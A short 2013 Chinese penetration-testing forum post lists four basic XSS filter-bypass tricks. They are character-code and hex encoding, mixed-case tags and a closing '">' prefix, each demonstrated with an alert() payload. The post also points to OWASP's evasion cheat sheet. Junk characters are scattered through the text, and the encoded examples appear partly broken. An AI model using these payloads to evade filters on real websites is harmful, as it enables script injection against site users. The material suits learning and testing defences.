中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]
作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。5 r( |4 J$ v! `0 z. H( q+ B- K
1.转换为ASCII码
" T8 P; z7 U$ }8 f6 {例子:原脚本为<script>alert(‘I love F4ck’)</script >
# F5 v0 ~4 \8 n) V) u7 O通过转换,变成:4 d7 _& ]8 o9 H
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
: ^& ^8 z0 h4 w0 A ) M8 ?4 E$ q5 i, e5 l! X
2.转换为HEX(十六进制)
+ O9 m0 O! W0 ^* v" Y: Y, [例子:原脚本为<script>alert(‘I love F4ck’)</script>( q7 _# x" n! M
通过转换,变成:
6 S  S& K0 H; ?4 j! u, G% h8 M  w%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e6 Q( ?% e3 K5 C) V
9 M, b$ J4 `6 N* v$ D; ^# }: \
3.转换脚本的大小写
4 u# A# S% n: @/ r# L  u. u; @例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 ^3 E  O; C2 S0 U" {3 b4 n, X) M转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
% R: r5 M  v( }5 j- F- k* O6 j
% O$ g, ]; y; t8 K3 ~' b4.增加闭合标记”>& v! q+ [$ B/ V$ K% ]6 y$ L
例子:原脚本为<script>alert(‘I love F4ck’)</script>) E  i- p% X$ t, Z( H1 f( R
转换为:”><script>alert(‘I love F4ck’)</script>
8 @0 B0 L5 m, U0 f+ u7 ~; R更详细绕过技术请参考此网页
5 ~/ Q$ o& t, Q* u6 yhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
6 o( B, ~9 ~. P- M3 D: c
( }) H% ?  _8 ^( R5 }& y转换工具使用的是火狐的 hackbar mozilla addon.



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2